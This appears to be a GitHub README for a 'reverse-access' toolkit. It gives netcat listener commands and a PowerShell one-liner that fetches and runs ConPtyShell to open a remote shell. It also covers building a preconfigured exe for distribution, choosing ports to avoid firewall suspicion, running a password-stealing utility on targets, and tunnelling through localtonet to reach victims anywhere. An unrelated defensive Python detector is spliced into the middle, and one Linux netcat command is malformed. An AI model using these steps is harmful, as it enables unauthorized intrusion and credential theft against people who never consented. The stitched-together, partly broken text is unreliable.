lolfactor39/reverse-access
REVERSE ACCESS GUIDE

Caution

This information is provided for educational purposes only and should be used ethically and responsibly. It is crucial to understand that performing hacking activities on computer systems or networks that you do not own, or without explicit, written permission from the owner, is illegal and can have severe legal consequences.

Reverse Shelling

Running on Linux

We will be using netcat on Linux. I used Kali Linux.

On Kali Linux, to listen on a port bound to the server's IP address, run this on the server:

nc -lvnp <PORT> -s <IPADDRESS>

Both machines need netcat installed if both are Linux.

Run this on the target computer:

nc /bin/bash <IPADDRESS> <PORT>

Note

The port and IP address must match on both computers: the target connects to the same address and port the server is listening on.

Running in Windows

On Windows, however, the process can be made much, much simpler.

We will use ConPtyShell, as described on its GitHub page.

On the server, the command is basically the same as before, but when the target system is Windows, run this on the server instead:

stty raw -echo; (stty size; cat) | nc -lvnp <PORT> -s <IPADDRESS>

On the Windows target system, run this command:

IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell -RemoteIp <IPADDRESS> -RemotePort <PORT>

To make things easier, I used the C# file from antonioCoco's repo and compiled it into an exe. So that you don't have to run the exe from the command prompt with the address and port as arguments, you can edit the C# file located in get_access/C#/. In ConPtyShell.cs, modify the public static class GlobalVariables to be:

public static class GlobalVariables
{
    public static string serverIp = "<IPADDRESS>";
    public static string serverPort = "<PORT>";
}

The default IP address is 192.168.68.88 and the default port is 555.

Then, using Visual Studio, compile it into an exe (a standalone exe is better for distribution).

Notes

If you don't want to make firewalls suspicious, use a port below 1000. Note that on Linux, binding a listener to a port below 1024 requires root (or the CAP_NET_BIND_SERVICE capability).

The PowerShell scripts in the ./util folder are optional to run; the exes are preferred.
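A defender's counterpart to the note above, added here as an example that is not part of this repository: choosing a low port only helps against rules that key on port numbers. Host-side detection instead asks which process owns the connection. The Python below parses constructed lines in the shape of Linux `ss -tnp` output (sample data, not a real capture) and flags established TCP connections held by a shell or netcat, with a stronger signal when the shell's standard input/output (fd 0, 1 or 2) is the socket itself. The ss column layout and the SHELL_PROCS list are assumptions to tune per host.

```python
import re
from dataclasses import dataclass

# Constructed sample in the shape of `ss -tnp` output on Linux (not a real capture).
# Addresses and PIDs are made up; 192.168.68.88:555 mirrors the defaults named in this guide.
SAMPLE_SS_OUTPUT = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port   Process
ESTAB  0      0      10.0.0.5:41234      192.168.68.88:555   users:(("bash",pid=4242,fd=0),("bash",pid=4242,fd=1))
ESTAB  0      0      10.0.0.5:52210      142.250.80.46:443   users:(("firefox",pid=1200,fd=77))
ESTAB  0      0      10.0.0.5:41300      192.168.68.88:443   users:(("nc",pid=4300,fd=3))
ESTAB  0      0      10.0.0.5:41301      10.0.0.9:22         users:(("ssh",pid=4310,fd=3))
"""

# Processes that should not normally hold an interactive TCP session (assumed list; tune per host).
SHELL_PROCS = {"bash", "sh", "dash", "zsh", "nc", "ncat", "netcat", "socat"}

LINE_RE = re.compile(
    r"^(?P<state>\S+)\s+\d+\s+\d+\s+(?P<local>\S+)\s+(?P<peer>\S+)\s+users:\((?P<procs>.*)\)\s*$"
)
PROC_RE = re.compile(r'\("(?P<name>[^"]+)",pid=(?P<pid>\d+),fd=(?P<fd>\d+)\)')


@dataclass(frozen=True)
class Finding:
    pid: int
    process: str
    peer: str
    reason: str


def parse_ss(output):
    """Yield (state, local, peer, [(name, pid, fd), ...]) for each parsable ss -tnp row."""
    for line in output.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # header line or a row without process info
        procs = [(p["name"], int(p["pid"]), int(p["fd"])) for p in PROC_RE.finditer(m["procs"])]
        yield m["state"], m["local"], m["peer"], procs


def find_reverse_shell_candidates(output):
    """Flag established connections owned by shell/netcat processes, regardless of peer port."""
    findings = {}
    for state, _local, peer, procs in parse_ss(output):
        if state != "ESTAB":
            continue
        for name, pid, fd in procs:
            if name not in SHELL_PROCS:
                continue
            key = (pid, peer)
            stdio = fd in (0, 1, 2)
            # A shell whose stdin/stdout *is* the socket is the classic reverse-shell shape;
            # keep the strongest reason seen for this pid/peer pair.
            if stdio or key not in findings:
                findings[key] = Finding(
                    pid=pid,
                    process=name,
                    peer=peer,
                    reason="shell stdio attached to socket"
                    if stdio
                    else "shell/netcat process holds established TCP connection",
                )
    return sorted(findings.values(), key=lambda f: f.pid)


if __name__ == "__main__":
    for f in find_reverse_shell_candidates(SAMPLE_SS_OUTPUT):
        print(f"pid={f.pid} proc={f.process} peer={f.peer} reason={f.reason}")
```

On the sample, the firefox and ssh rows pass while both the bash session on port 555 and the nc process on port 443 are flagged; the 443 case is the one a port-only firewall rule would wave through, which is the point of keying on the owning process rather than the port.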

Utilities

In util/ there are executables that you can run from the command prompt to get an output.

Get Password

Once the Windows target is connected to the server, you can run stealpassword.exe from util/getPassword to (hopefully) get the target machine's password. Run it through the command prompt; once the file is executed and the user types their computer password, you will be able to see the target's password.

More Info

Visit AntonioCoco's ConPtyShell Repo

Visit Network Chuck's video

Credits:

antonioCoco

networkChuck

Using a Public IP Address to Connect from Anywhere

Everything shown up to this point covers connecting while on the same network. However, I found a way to connect from anywhere: using the website localtonet.com, I created a free account and was able to connect to my server through their service.

Note

This works for both remote desktop control and reverse shelling.

The following is how to do it the way I did:

Step 1: Creating an account:

You can create an account for free at the provided website.

Step 2: Downloading the Client:

Navigate to the downloads page and download the client that fits your server.

Step 3: Run the Client:

Since I am using Kali Linux as my server, I downloaded the zip and then unzipped it. In the unzipped directory, I ran ./localtonet.

When asked for your auth token, go to your localtonet dashboard, copy the auth token from there, and paste it into the prompt.

Then, navigate to the TCP-UDP page (screenshot not included).

There, we will create a new TCP tunnel. For the protocol, choose TCP. For the auth token, choose the default token. For the server, choose the location closest to you. For the IP, keep 127.0.0.1. For the port, choose the port you want to listen on at the local server (when I was on the same network I used port 555; this is the local port that localtonet will forward requests to). For the domain type, keep localto.net. Then press Create.

BOOM! Now whatever is listening on 127.0.0.1 at port 555 (or the local port you chose) is reachable by the public. The traffic is also encrypted.

Step 4: Connect to the Target

For netcat on Kali Linux, if the target is Windows, listen with stty raw -echo; (stty size; cat) | nc -lvnp <PORT> -s 127.0.0.1. If the target is Linux, use nc -lvnp <PORT> -s 127.0.0.1. Here <PORT> is the local port the tunnel forwards to (555 in the example above).

In get_access/C#/ConPtyShell.cs, add this class near the top to resolve the IP address of your server's localtonet domain at run time (it needs using System.Net; at the top of the file):

// Requires: using System.Net;
public static class DnsResolver
{
    // Resolve a hostname and return its first IPv4 address as a string,
    // falling back to the first address of any family, or null if none resolved.
    public static string GetFirstIpAddress(string domain)
    {
        var addresses = Dns.GetHostAddresses(domain);
        foreach (var address in addresses)
        {
            if (address.AddressFamily == System.Net.Sockets.AddressFamily.InterNetwork) // Only IPv4
            {
                return address.ToString();
            }
        }
        return addresses.Length > 0 ? addresses[0].ToString() : null;
    }
}

Then replace the global variables with this:

public static class GlobalVariables
{
    public static string serverIp = DnsResolver.GetFirstIpAddress("<LOCALTONETDOMAIN>");
    public static string serverPort = "<SERVERPORT>";
}

The server port is the one shown in the localtonet dashboard for the tunnel you created (screenshot not included).

Simply compile the file, and you will have an exe that connects to your server from anywhere in the world.

On Linux, the command to connect is:

nc /bin/bash <LOCALTONET_DOMAIN_IPADDR> <LOCALTONET_DOMAIN_SERVER_PORT>

About

Reverse Shelling with Netcat provided with awesome utilities.
